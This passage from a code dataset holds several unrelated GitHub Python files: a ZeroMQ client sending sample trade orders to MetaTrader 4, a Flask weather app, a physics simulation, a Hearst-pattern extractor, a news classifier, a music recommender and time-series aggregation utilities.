socket.setsockopt(zmq.SUBSCRIBE,\"tick\")\n#\n#\n# while True:\n# string = socket.recv()\n# print(string + \" \" + str(date2num(datetime.now())))\n# print(len(string))\n\n\n# def result_collector():\n#\n# context = zmq.Context()\n# socket = context.socket(zmq.SUB)\n# socket.setsockopt(zmq.SUBSCRIBE, 'USD_CAD ')\n# 
socket.connect(\"tcp://127.0.0.1:5558\")\n# while True:\n# msg = socket.recv()\n# print(msg)\n#\n# result_collector()\n#\n# def publisher():\n# stock_symbols = ['RAX', 'EMC', 'GOOG', 'AAPL', 'RHAT', 'AMZN']\n#\n# context = zmq.Context()\n# socket = context.socket(zmq.PUB)\n# socket.bind(\"tcp://127.0.0.1:4999\")\n#\n# while True:\n# time.sleep(3)\n# # pick a random stock symbol\n# stock_symbol = choice(stock_symbols)\n# # set a random stock price\n# stock_price = randrange(1, 100)\n#\n# # compose the message\n# msg = \"{0} ${1}\".format(stock_symbol, stock_price)\n#\n# print(\"Sending Message: {0}\".format(msg))\n#\n# # send the message\n# socket.send(msg)\n# # Python3 Note: Use the below line and comment\n# # the above line out\n# # socket.send_string(msg)\n#\n# def subscriber():\n# context = zmq.Context()\n# socket = context.socket(zmq.SUB)\n# socket.setsockopt(zmq.SUBSCRIBE, '')\n# socket.bind(\"tcp://127.0.0.1:2027\")\n#\n# while True:\n# msg = socket.recv()\n# # Python3 Note: Use the below line and comment\n# # the above line out\n# # msg = socket.recv_string()\n# print(\" msg - \" + msg)\n\n#\n# subscriber()\n\n# publisher()\n# subscriber()\n\n# import sys\n# import zmq\n#\n# port = \"2027\"\n#\n#\n# # Socket to talk to server\n# context = zmq.Context()\n# socket = context.socket(zmq.SUB)\n#\n# socket.connect(\"tcp://localhost:%s\" % port)\n#\n# # Subscribe to zipcode, default is NYC, 10001\n# topicfilter = \"tick\"\n# socket.setsockopt(zmq.SUBSCRIBE, topicfilter)\n#\n# # Process 5 updates\n# total_value = 0\n# for update_nbr in range(5):\n# string = socket.recv()\n# topic, messagedata = string.split()\n# total_value += int(messagedata)\n# print topic, messagedata\n#\n# print \"Average messagedata value for topic '%s' was %dF\" % (topicfilter, total_value / update_nbr)\n#\n#\n#\n#\n#\n#\n\n\n\n\n\n\n# import zmq\n # import random\n # import sys\n # import time\n #\n # port = \"2027\"\n # if len(sys.argv) > 1:\n # port = sys.argv[1]\n # int(port)\n #\n # context = zmq.Context()\n # socket = context.socket(zmq.PUB)\n # socket.bind(\"tcp://*:%s\" % port)\n # while True:\n # topic = random.randrange(9999,10005)\n # messagedata = random.randrange(1,215) - 80\n # print \"%d %d\" % (topic, messagedata)\n # socket.send(\"%d %d\" % (topic, messagedata))\n # time.sleep(1)\n\n\n# compArray[0] = TRADE\n# compArray[1] = ACTION(e.g.OPEN, MODIFY, CLOSE)\n# compArray[2] = TYPE(e.g.OP_BUY, OP_SELL, etc - only\n# used\n# when\n# ACTION = OPEN)\n#\n# // ORDER\n# TYPES:\n# // https: // docs.mql4.com / constants / tradingconstants / orderproperties\n#\n# // OP_BUY = 0\n# // OP_SELL = 1\n# // OP_BUYLIMIT = 2\n# // OP_SELLLIMIT = 3\n# // OP_BUYSTOP = 4\n# // OP_SELLSTOP = 5\n#\n# compArray[3] = Symbol(e.g.EURUSD, etc.)\n# compArray[4] = Open / Close\n# Price(ignored if ACTION = MODIFY)\n# compArray[5] = SL\n# compArray[6] = TP\n# compArray[7] = lOTS\n# compArray[8] = comments / ticket\nimport time\nimport zmq\n# Sample Commands for ZeroMQ MT4 EA\neurusd_buy_order = \"TRADE|OPEN|0|EURUSD|0|50|50|0.01|Python-to-MT4\"\neurusd_sell_order = \"TRADE|OPEN|1|EURUSD|0|50|50|0.01|Python-to-MT4\"\neurusd_closebuy_order = \"TRADE|CLOSE|0|EURUSD|0|50|50|0.01\"\nget_rates = \"RATES|EURUSD\"\n\n# Sample Function for Client\ndef zeromq_mt4_ea():\n\n print(\"Starting client\")\n # Create ZMQ Context\n context = zmq.Context()\n\n # Create REQ Socket\n reqSocket = context.socket(zmq.REQ)\n reqSocket.connect(\"tcp://localhost:5555\")\n\n # Create PULL Socket\n pullSocket = context.socket(zmq.PULL)\n 
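# Added note (editorial): the REQ socket above carries the blocking command/reply\n    # handshake, while this PULL socket drains whatever the MT4 EA pushes back\n    # asynchronously (rates, order tickets, trade confirmations).\n    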
pullSocket.connect(\"tcp://localhost:5556\")\n\n\n    # # Send RATES command to ZeroMQ MT4 EA\n    remote_send(reqSocket, get_rates)\n\n    # PULL from pullSocket\n    remote_pull(pullSocket)\n    \n\n    #\n    # Send SELL EURUSD command to ZeroMQ MT4 EA (comment fixed: the sell order is sent here)\n    remote_send(reqSocket, eurusd_sell_order)\n    time.sleep(1)\n    ticket = remote_pull(pullSocket)\n    if ticket is not None and '|' in ticket:\n        ticket = ticket.split('|', 1)[1]\n        # print(\"TICKET : \", ticket)\n    else:\n        ticket = -1\n\n    print(remote_pull(pullSocket))\n    print(remote_pull(pullSocket))\n    time.sleep(5)\n    # Send CLOSE EURUSD command to ZeroMQ MT4 EA. You'll need to append the\n    # trade's ORDER ID to the end, as below for example:\n    if ticket != -1:\n        remote_send(reqSocket, eurusd_closebuy_order + \"|\" + ticket)\n\n    # PULL from pullSocket\n    remote_pull(pullSocket)\n\n\n\n# Function to send commands to ZeroMQ MT4 EA\ndef remote_send(socket, data):\n\n    try:\n        socket.send_string(data)\n        time.sleep(1)\n        msg = socket.recv_string()\n        print(\"SENT: \", data)\n        print(\"RECEIVED-REP: \", msg)\n    except zmq.Again as e:\n        print(\"Waiting for PUSH from MetaTrader 4..\")\n\n# Function to retrieve data from ZeroMQ MT4 EA\ndef remote_pull(socket):\n\n    try:\n        # msg = socket.recv(flags=zmq.NOBLOCK)\n        msg = socket.recv(flags=zmq.NOBLOCK)\n        print(\"RECEIVED-PULL: \", msg)\n        return str(msg)\n\n    except zmq.Again as e:\n        print(\"Waiting for PUSH from MetaTrader 4..\")\n\n\n# Run Tests\nfor i in range (0,5):\n    zeromq_mt4_ea()\n\n\n\n\n","repo_name":"mglcampos/trader","sub_path":"zmq_client.py","file_name":"zmq_client.py","file_ext":"py","file_size_in_byte":5893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15018104496","text":"masked_color = 0\r\nnon_masked_color = 255\r\n\r\ndataset = \"places2\\\\\"\r\n\r\nmethods_inpaint = [\"CRA\", \"DFN\", \"HII\"]\r\n\r\nabs_path = \"C:\\\\Users\\\\maste\\\\Documents\\\\materials\\\\\"  # Specify here the folder that will hold the image database\r\n\r\nabs_path_masks = abs_path + \"masks\\\\\"\r\nabs_path_images = abs_path + \"images\\\\\"\r\nabs_path_fragmented = abs_path + \"fragmented\\\\\"\r\nabs_path_result = abs_path + \"results\\\\\"\r\n\r\npath_mask_frame = \"mask_frame\\\\\"\r\npath_mask_noise = \"mask_noise\\\\\"\r\npath_mask_rectangle = \"mask_rectangle\\\\\"\r\npath_mask_grid = \"mask_grid\\\\\"\r\npath_mask_half = \"mask_half\\\\\"\r\n\r\npath_image_frame = \"image_frame\\\\\"\r\npath_image_noise = \"image_noise\\\\\"\r\npath_image_rectangle = \"image_rectangle\\\\\"\r\npath_image_grid = \"image_grid\\\\\"\r\npath_image_half = \"image_half\\\\\"\r\n\r\npath_recovery_frame = \"recovery_frame\\\\\"\r\npath_recovery_noise = \"recovery_noise\\\\\"\r\npath_recovery_rectangle = \"recovery_rectangle\\\\\"\r\npath_recovery_grid = \"recovery_grid\\\\\"\r\npath_recovery_half = \"recovery_half\\\\\"\r\n\r\nparams_small = [0.05, 0.1, 0.2]\r\nparams = [0.1, 0.2, 0.3, 0.4, 0.5]\r\nparams_img = [str(x) + \"_\" for x in params]\r\nparams_small_img = [str(x) + \"_\" for x in params_small]\r\n","repo_name":"Strat3g1st/NIRS","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44814099318","text":"from flask import Flask, render_template, request, redirect\nfrom urllib.request import urlopen\nimport json\nimport math\nfrom datetime import datetime\n\nfrom werkzeug.utils import redirect\n\napp = Flask(__name__)\n\napp.secret_key = 'super 
secret key'\n\n# go to openweathermap.org to recieve your API key!\napi_key = \"paste your api weather key here\"\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/showWeather\", methods=[\"GET\", \"POST\"])\ndef weather():\n if request.method == \"POST\":\n city = request.form.get(\"city\")\n else:\n city = \"Ahmedabad\"\n\n weather_url = urlopen(f\"http://api.openweathermap.org/data/2.5/weather?q={city}&appid={api_key}\")\n weather_data = json.loads(weather_url.read())\n\n final_temp = math.trunc(weather_data['main']['temp']-273)\n\n icon_code = weather_data['weather'][0]['icon']\n\n status = weather_data['weather'][0]['main']\n\n wind_speed = weather_data['wind']['speed']\n\n now = datetime.now()\n current_time = now.strftime(\"%H:%M\")\n # print(\"Current Time =\", current_time)\n return render_template(\"weather.html\", weather = final_temp, city = city, iconcode = icon_code, status = status, wind = wind_speed, time = current_time)\n\n@app.route(\"/home_redirect\")\ndef redirect_to_home():\n return redirect(\"/\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"AxayPatoliya/Weather-API-using-Flask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3205889521","text":"\"\"\"Runs the simulations and outputs data.\"\"\"\n\nimport numpy\nimport argparse\n\nfrom simulator import Detector, Generator\n\nimport setup\n\n\n# Parse terminal inputs\nparser = argparse.ArgumentParser(description='Runs the particle simulation.')\nparser.add_argument('--Nevents', default=1000, type=int)\n\nargs = parser.parse_args()\n\n# Initialise the generator and the detector\ngenerator = Generator(setup.theta_max)\ndetectors = [Detector(setup.boundaries, setup.Npixs, setup.z0 + i * setup.dz)\n for i in range(5)]\n\n# Get some number of events\nevents = generator.generate(args.Nevents)\n\ndata_names = ['xpixel', 'ypixel', 't', 'z']\nID_names = ['detectorID', 'eventID']\nnames = data_names + ID_names\nformats = ['float64'] * 4 + ['int64'] * 2\nout = numpy.zeros(args.Nevents * len(detectors),\n dtype={'names': names, 'formats': formats})\n\n# Processes each event at each detector and saves as numpy array\ni = 0\nfor event in events:\n eventID = hash(frozenset(event.values()))\n for detector in detectors:\n collision = detector.evaluate_collision(event)\n detectorID = hash(frozenset(collision.values()))\n for name in data_names:\n out[name][i] = collision[name]\n out['detectorID'][i] = detectorID\n out['eventID'][i] = eventID\n i += 1\n\nnumpy.save(setup.simulation_fname, out)\nprint('Finished simulating the events.')\n","repo_name":"Richard-Sti/Particle-Detector","sub_path":"runs/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22646667537","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 15 13:55:23 2020\n\n@author: kampe\n\"\"\"\n\nimport itertools\nimport logging\nfrom functools import cmp_to_key\nfrom typing import List, Tuple\n\nimport networkx as nx\nimport spacy\nfrom spacy.tokens.span import Span\n\n\nclass Hearst:\n field = \"hearst\"\n doc_section = \"abstract\"\n\n def __init__(self, model: str = \"en_core_web_lg\", extra=[]):\n \"\"\"\n Loads a spaCy model.\n\n Parameters\n ----------\n model : str\n The name of a spaCy 
model, e.g. \"en_core_web_lg\".\n\n Returns\n -------\n None.\n\n \"\"\"\n self.nlp = spacy.load(model, exclude=[\"ner\", \"textcat\"])\n for add_me in extra:\n if \"component\" in add_me and \"config\" in add_me:\n self.nlp.add_pipe(add_me[\"component\"], config=add_me[\"config\"])\n\n self.IntervalKey = cmp_to_key(self.interval_sort)\n\n def interval_sort(self, entity1, entity2) -> int:\n if entity1[0] < entity2[0]:\n return -1\n if entity1[0] > entity2[0]:\n return 1\n return entity2[1] - entity1[1]\n\n def conflate_conjuncts(self, chunks: List[Span]) -> List[List[Span]]:\n intervals = []\n for c in chunks:\n parts = c.conjuncts\n intervals.append(\n (\n min(min(map(lambda x: x.i, parts)), c.start),\n max(max(map(lambda x: x.i, parts)), c.end - 1),\n c,\n )\n if parts\n else (c.start, c.end - 1, c)\n )\n\n intervals.sort(key=self.IntervalKey)\n filtered = []\n start = -1\n end = -1\n for interval in intervals:\n if interval[0] >= start and interval[1] <= end:\n filtered[len(filtered) - 1].append(interval[2])\n continue\n filtered.append([interval[2]])\n start = interval[0]\n end = interval[1]\n return filtered\n\n def process(self, text: str) -> List[Tuple[str]]:\n \"\"\"\n Extended information on the technique can be found in the original paper:\n\n Hearst, M. A.\n Automatic Acquisition of Hyponyms from Large Text Corpora\n COLING 1992 Volume 2: The 15th International Conference on Computational Linguistics, 1992\n https://www.aclweb.org/anthology/C92-2082\n\n Parameters\n ----------\n text : str\n Raw text.\n\n Returns\n -------\n List[Tuple[str]]\n A list of 3-tuples stating hyponymy relations, e.g. [('X', 'such as', 'Y')].\n\n \"\"\"\n doc = self.nlp(text)\n hits = []\n\n for sent in doc.sents:\n edges = []\n for token in sent:\n for child in token.children:\n edges.append((token.i, child.i))\n\n graph = nx.Graph(edges)\n candidates = list(sent.noun_chunks)\n candidates = self.conflate_conjuncts(candidates)\n print(f\"candidates: {candidates}\")\n\n for source, target in itertools.combinations(candidates, 2):\n source_root = source[0].root.i\n target_root = target[0].root.i\n logging.debug(\"%d->%d:\", source[0].root.i, target[0].root.i)\n try:\n path = nx.shortest_path(\n graph, source=source_root, target=target_root\n )\n logging.debug([doc[x].text for x in path])\n if (\n len(path) == 3\n and doc[path[1]].text == \"as\"\n and doc[path[1] - 1].text == \"such\"\n ):\n span1 = source[0]\n if (\n doc[span1.start].pos_ == \"DET\"\n or doc[span1.start].pos_ == \"PUNCT\"\n ):\n span1 = Span(doc, span1.start + 1, span1.end)\n for t in target:\n span2 = t\n if doc[span2.start].pos_ == \"DET\":\n span2 = Span(doc, span2.start + 1, span2.end)\n hits.append((span1.text, \"such as\", span2.text))\n except nx.NetworkXNoPath:\n pass\n print(hits)\n return {Hearst.field: hits}\n\n def release_resources(self):\n del self.nlp\n","repo_name":"pikatech/Scicopia-tools","sub_path":"scicopia_tools/analyzers/Hearst.py","file_name":"Hearst.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12321616221","text":"# https://www.hackerrank.com/challenges/find-digits/problem\n# Find Digits\n# Calculate the number of digits in an integer that evenly divide it.\n\n#import math\n#import os\n#import random\n#import re\n#import sys\n\n#\n# Complete the 'findDigits' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts INTEGER n as parameter.\n#\n\ndef findDigits(n):\n # 
Write your code here\n    num = int(n);\n    count = 0;\n    while(num != 0):\n        if(num % 10 == 0):\n            num = num // 10;\n            continue;\n        if(n % (num % 10) == 0):\n            count += 1;\n        num = num // 10;\n    return count;\n    \n\nif __name__ == '__main__':\n    #fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n    t = int(input().strip())\n\n    for t_itr in range(t):\n        n = int(input().strip())\n\n        result = findDigits(n)\n        \n        print(str(result));\n        #fptr.write(str(result) + '\\n')\n\n    #fptr.close()\n\n\n'''\nSample Input:\n2\n12\n1012\n\nSample Output:\n2\n3\n\n'''\n","repo_name":"MaxSoEn/IEEE-ZSB-Technical-Rookies-22","sub_path":"Task-4/problem-5.py","file_name":"problem-5.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41437606048","text":"import lxml.html as html_parser\n\nimport config\nfrom .training import train\nimport nltk\nimport pickle\n\nNEWS_WORDS = [\n    \"news\",\n    \"breaking\",\n    \"breaking news\",\n    \"today\",\n    \"yesterday\",  # a missing comma here silently concatenated this with the next literal\n    \"this evening\",\n    \"this afternoon\",\n    \"happened\",\n    \"why\",\n    \"rescued\",\n    \"player\", \"players\",\n    \"announced\",\n    \"известие\",\n    \"разрывной\",\n    \"последние новости\",\n    \"сегодня\",\n    \"вчера\",\n    \"этот вечер\",\n    \"сегодня днем\",\n    \"произошедший\",\n    \"зачем\",\n    \"спасённый\",\n    \"проигрыватель\", \"проигрыватели\",\n    \"анонсированный\",\n]\n\nNOT_NEWS_WORDS = [\n    \"top\",\n    \"how to\",\n    \"best\",\n    \"gift\", \"gifts\",\n    \"best\",\n    \"your\",\n    \"here are my\", \"here is my\",\n    \"my favourite\",\n    \"things\",\n    \"most\",\n    \"известие\",\n    \"как\",\n    \"лучший\",\n    \"дар\", \"подарки\",\n    \"лучший\",\n    \"твой\",\n    \"вот мой\", \"вот мой\",\n    \"мой любимый\",\n    \"вещи\",\n    \"весьма\",\n]\n\n\ndef generate_parsed_file(filename, *args, **kwargs):\n    # This is needed in multiprocessing functions\n    return ParsedFile(filename, *args, **kwargs)\n\n\nclass ParsedFile:\n    # Load the profiles\n    _language_profiles = {}\n    _cat_profiles = dict((l, dict()) for l in config.LANGUAGES)\n    for lang in config.LANGUAGES:\n        with open(config.PROFILE_DATA + '/' + lang + '.pickle', 'rb') as f:\n            _language_profiles[lang] = pickle.load(f)\n\n        for cat in config.CATEGORIES:\n            with open(f\"{config.PROFILE_DATA}/{lang}_{cat}.pickle\", 'rb') as cf:\n                _cat_profiles[lang][cat] = pickle.load(cf)\n\n    def __init__(self, filename, pre_compute=()):\n        self._filename = filename\n        self.filename = self._filename.split('/')[-1]\n\n        self.contents = None\n        self.title = None\n\n        self._article = None\n        self._ngrams = None\n        self._short_ngrams = None\n        self._stopwords_ngrams = None\n        self._lang = None\n        self._category = None\n        self._news_score = None\n\n        # Open and parse the file\n        with open(self._filename, 'r') as f:\n            _raw_contents = f.read()\n        _html_root = html_parser.fromstring(_raw_contents)\n        _children = _html_root.getchildren()\n        _, body = _children[0], _children[1]\n        _article = body.getchildren()[0]\n        self.title = _article.xpath('normalize-space(//h1)')\n        self.contents = _article.text_content()\n        words = len(_article.text_content().split())\n        paragraphs = _article.findall(\"p\")\n        links = 0\n        for p in paragraphs:\n            hrefs = len(p.findall(\"a\"))\n            if hrefs > 0:\n                links += hrefs\n        figures = len(_article.findall(\"figure\"))\n        self.ranking_score = (words // 10) + (figures * 3) + (links * 1.5)\n\n        # Pre compute statements\n        if 'lang' in pre_compute:\n            self.lang()\n        if 'category' in pre_compute:\n            self.category()\n        if 'news_score' in pre_compute:\n            self.news_score()\n        if 'short_ngrams' in pre_compute:\n            
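# Added note (editorial): ParsedFile objects are created via generate_parsed_file()\n            # inside worker processes, so anything cached at construction time travels back\n            # with the returned object instead of being recomputed by the parent process.\n            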
self.short_ngrams()\n\n def lang(self):\n if self._lang is not None:\n return self._lang\n\n stopwords_ngrams = self.stopwords_ngrams()\n guesses = dict.fromkeys(config.LANGUAGES)\n for lang in guesses:\n guesses[lang] = nltk.jaccard_distance(stopwords_ngrams, ParsedFile._language_profiles[lang])\n best_guess = min(guesses, key=guesses.get)\n\n if guesses[best_guess] > config.LANGUAGE_MAX_DISTANCE:\n best_guess = \"other\"\n self._lang = best_guess\n return self._lang\n\n def category(self):\n if self._category is not None:\n return self._category\n if self.lang() not in config.LANGUAGES or not self.news_score():\n self._category = 0\n return self._category\n\n guesses = {c: 0 for c in config.CATEGORIES}\n iter_cat = iter(config.CATEGORIES)\n for category in ParsedFile._cat_profiles[self.lang()]:\n guesses[next(iter_cat)] = nltk.jaccard_distance(self.ngrams(), ParsedFile._cat_profiles[self.lang()][category])\n\n min_value = min(guesses, key=guesses.get)\n if guesses[min_value] > config.CATEGORIZATION_MAX_DISTANCE:\n self._category = \"other\"\n else:\n self._category = min_value\n return self._category\n\n def news_score(self):\n if self._news_score is not None:\n return self._news_score\n if self.lang() not in config.LANGUAGES:\n self._news_score = 0\n return self._news_score\n\n score = 0\n for word in self.title.split(' '):\n if word.lower() in NEWS_WORDS:\n score += 1.5\n if word.lower() in NOT_NEWS_WORDS:\n score -= 1\n self._news_score = score > -1\n return self._news_score\n\n def ngrams(self):\n if self._ngrams is not None:\n return self._ngrams\n\n self._ngrams = train.generate_ngrams(self.contents)\n return self._ngrams\n\n def short_ngrams(self):\n if self._short_ngrams is not None:\n return self._short_ngrams\n if self.lang() not in config.LANGUAGES or not self.news_score():\n self._short_ngrams = {}\n return self._short_ngrams\n\n ngram_string = self.title + ' '.join(self.contents.split()[:50])\n self._short_ngrams = train.generate_ngrams(ngram_string, 3)\n return self._short_ngrams\n\n def stopwords_ngrams(self):\n if self._stopwords_ngrams is not None:\n return self._stopwords_ngrams\n\n self._stopwords_ngrams = train.generate_ngrams(self.contents, maximum=1, only_stopwords=True)\n return self._stopwords_ngrams\n","repo_name":"MarcoBuster/data-clustering-contest","sub_path":"src/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5891,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"13594545737","text":"total = soma = maior = menor = 0\nrep = 'S'\nwhile rep in 'Ss':\n n = int(input('digite um número:'))\n rep = str(input('Deseja continuar [S/N]? 
')).upper().strip()[0]\n    if total == 0:\n        menor = n\n    total += 1\n    soma += n\n    if n > maior:\n        maior = n\n    if n < menor:\n        menor = n\nmedia = soma / total\nprint(f'''Você digitou {total} vezes, a soma entre os valores são {soma}\nA media ficou {media} e os maior número é {maior} e o menor número é {menor}.''')","repo_name":"Xaixen/Python3","sub_path":"Exercícios 1/maior e menores var.py","file_name":"maior e menores var.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2477485944","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\n\ndef get_coord(self, point_tags):\n    \"\"\"Return the coordinates of point(s).\n\n    Parameters\n    ----------\n    self : PointMat\n        a PointMat object\n    point_tags : np.array\n        an array of point tags\n\n    Returns\n    -------\n    coord: np.array\n        an array of point coordinates\n\n    \"\"\"\n\n    nd_case = np.size(point_tags)\n    coord = np.zeros((nd_case, 2))\n    # the single-point and multi-point cases reduce to the same indexing\n    coord = self.coordinate[point_tags, :]\n\n    if np.size(coord) == 0:\n        return None\n    else:\n        return coord\n","repo_name":"gverez/pyleecan","sub_path":"pyleecan/Methods/Mesh/PointMat/get_coord.py","file_name":"get_coord.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"25471081387","text":"import copy\nimport os\nimport sys\nimport json\nfrom db_accessing.VO import Album_VO, Album_recommend_VO\nfrom modules.natural_language.NL import NL_processor\nfrom modules.recommendation.similarity_functions import cosine_similarity\n\ndef make_user_interest_vector(user_interests, sample_dict):\n    # unique_interests[i] 가 관심사 리스트에 존재한다면 i 번째 요소가 1이고, 존재하지 않으면 0인 벡터를 생성\n    return [1 if interest in user_interests else 0\n            for interest in sample_dict]\n\ndef merge_similarity():\n    pass\n\n\nbatchsize = 200\nrecommend_size = 5\n\nlenOfNotNULL = Album_VO.query.filter(Album_VO.Description != None).count()\nprint(lenOfNotNULL, type(lenOfNotNULL))\n\n\nx = Album_VO.query.filter(Album_VO.Description != None).offset(210).limit(batchsize).all()\nfor seg in x:\n    print(seg.Album_Title)\n# print(len(x), type(x))\n\nsim_best3 = []\nfor i in range(batchsize):\n    print('outerloop count: ', i)\n    NLP_noun_count_dict = NL_processor(x[i].Description).noun_count_result\n    ht_list = list(NLP_noun_count_dict.keys())\n    inner_sim_best3 = []\n    for j in range(batchsize):\n\n        if i != j:\n            inner_ht_list = list(NL_processor(x[j].Description).noun_count_result.keys())\n\n            dictionary_set = copy.deepcopy(ht_list)\n            dictionary_set.extend(inner_ht_list)\n            dictionary_set = list(set(dictionary_set))\n\n            # print(\"dict_set : \", dictionary_set)\n\n            IR_Vector_inner = make_user_interest_vector(inner_ht_list, dictionary_set)\n            IR_Vector_outer = make_user_interest_vector(ht_list, dictionary_set)\n            # print(IR_Vector_inner)\n            # print(IR_Vector_outer)\n            sim = cosine_similarity(IR_Vector_inner, IR_Vector_outer)\n            # print(sim)\n\n            if len(inner_sim_best3) == recommend_size:\n                # print('if문', file=sys.stderr)\n                for k in range(recommend_size):\n                    if inner_sim_best3[k][0] < sim:\n                        inner_sim_best3[k] = [sim, x[j]]\n                        inner_sim_best3.sort(key = lambda element : element[0])\n                        break\n                # print(inner_sim_best3)\n            else:\n                # print('else 문', file=sys.stderr)\n                inner_sim_best3.append([sim, x[j]])\n                inner_sim_best3.sort(key = lambda element : element[0])\n                # print(inner_sim_best3)\n\n    sim_best3.append(inner_sim_best3)\n    # print(inner_sim_best3, 
file=sys.stderr)\n\n\n\n# Json 파일로 결과 dict 를 저장\n\ndef recommended_list_to_json(rec_list):\n fname = '{0}/recommand_album_{1}.json'.format(dir, x[res_i].Album_ID)\n with open(fname, mode='w', encoding='utf8') as f:\n for dict_input in rec_list:\n json.dump(dict_input,fp=f, ensure_ascii=False)\n f.write('\\n')\n\nfor res_i in range(batchsize):\n print(x[res_i].Album_Title, \"'s recomend Album is : \\n\\t\")\n rec_list = []\n for i in range(len(sim_best3[res_i])):\n print(\">>> [{0}] {1} : {2} \\n\\t\".format(sim_best3[res_i][i][0], sim_best3[res_i][i][1].Album_ID, sim_best3[res_i][i][1].Album_Title, file=sys.stderr))\n dict_result = {\"ID\": sim_best3[res_i][i][1].Album_ID, \"Title\": sim_best3[res_i][i][1].Album_Title,\"similarity\": sim_best3[res_i][i][0]}\n rec_list.append(dict_result)\n recommended_list_to_json(rec_list)\n\n\n\ndef recommended_list_to_DB(AlbumRecommendVO):\n\n # 반드시 쌍따옴표...key\n str = u'{\"rec1\":123123,\"rec2\":33212,\"rec3\":313455}'\n dict1 = json.loads(str)\n print(dict1, type(dict1))","repo_name":"bitacademy-howl/Music_Recommendation_mod","sub_path":"test_module/reco_save_module.py","file_name":"reco_save_module.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43012662854","text":"import pandas as pd\nimport numpy as np\n\n\nclass AggregateData():\n \"\"\" This class compute the aggregation of a time series data by using a different methods, for a\n specific period of time. All of these methods work on a Pandas Series object.\n\n Args:\n -----\n\n interval (string) >>> Time interval which calculate the aggregate function.\n method (string) >>> It's possible to aggragate the data by mean, max, min and percentile. Default is mean\n percentile (int) >>> Optional. Percentile, integer number beetween 0 and 100. 
Default is 0.5 (median).\n \"\"\"\n\n def __init__(self, interval, method=\"mean\", percentile=50):\n\n methods_avaible = ['mean', 'max', 'min', 'percentile']\n\n if method not in methods_avaible:\n raise Exception('Invalid method')\n if percentile <= 0 or percentile >= 100:\n raise Exception('Invalid percentile')\n\n self.method = method\n self.interval = interval\n self.percentile = percentile / 100\n\n def meanAgg(self, data):\n \"\"\"\n Args:\n -----\n data (pandas.Series) >>> index datetime64[ns], values the data observed.\n\n Returns:\n --------\n pandas.Series with the mean calculated for the time interval specified\n \"\"\"\n\n return data.resample(self.interval).mean()\n\n def maxAgg(self, data):\n \"\"\"\n Args:\n -----\n data (pandas.Series) >>> index datetime64[ns], values the data observed.\n\n Returns:\n --------\n pandas.Series with the maximum calculated for the time interval specified\n \"\"\"\n\n return data.resample(self.interval).max()\n\n def minAgg(self, data):\n \"\"\"\n Args:\n -----\n data (pandas.Series) >>> index datetime64[ns], values the data observed.\n\n Returns:\n --------\n pandas.Series with the mininum calculated for the time interval specified\n \"\"\"\n\n return data.resample(self.interval).min()\n\n def percentileAgg(self, data):\n \"\"\"\n Args:\n -----\n data (pandas.Series) >>> index datetime64[ns], values the data observed.\n\n Returns:\n --------\n pandas.Series with the percentile calculated for the time interval specified\n \"\"\"\n\n return data.resample(self.interval).apply(lambda x: x.quantile(self.percentile))\n\n def fit(self, data):\n \"\"\" Methods used to apply a specific aggregation function to a pandas time series.\n\n Args:\n -----\n data (pandas.Series) >>> index datetime64[ns], values the data observed.\n\n Returns:\n --------\n pandas.Series with the results of the specifc aggregation method invoke\n \"\"\"\n\n if self.method == \"mean\":\n return self.meanAgg(data)\n elif self.method == \"max\":\n return self.maxAgg(data)\n elif self.method == \"min\":\n return self.minAgg(data)\n elif self.method == \"percentile\":\n return self.percentileAgg(data)\n else:\n raise Exception(\"Invalid method\")\n\n\nclass MovingAverage():\n\n \"\"\" This class include a methods for the calculus of the moving average ('simple' and 'exponential') for a time series\n\n Args:\n -----\n method (string) >>> Method for the calculus of the moving average, it can be 'simple' or 'exponential'.\n Default is 'simple'.\n\n window_size (int) >>> Time window size. 
Default is equal to 2.\n \"\"\"\n\n def __init__(self, method=\"simple\", window_size=2):\n\n methods_avaible = ['simple', 'exponential']\n\n if method not in methods_avaible:\n raise Exception('Invalid method')\n if window_size <= 1:\n raise Exception('window_size too short')\n\n self.method = method\n self.window_size = window_size\n\n def simple(self, data):\n \"\"\" Computes moving average using discrete linear convolution of two one dimensional sequences.\n\n Args:\n -----\n data (pandas.Series) >>> independent variable\n\n Returns:\n --------\n pandas.Series\n \"\"\"\n\n return data.rolling(self.window_size).mean()\n\n def exponential(self, data):\n \"\"\" Computes exponential moving average\n\n Args:\n -----\n data (pandas.Series) >>> independent variable\n\n Returns:\n --------\n pandas.Series\n \"\"\"\n\n weights = np.exp(np.linspace(-1., 0., self.window_size))\n weights /= weights.sum()\n exp_ma = np.convolve(data, weights, mode='full')[:len(data)]\n exp_ma[:self.window_size] = np.NaN\n return pd.Series(data=exp_ma, index=data.index)\n\n def fit(self, data):\n \"\"\" Methods used 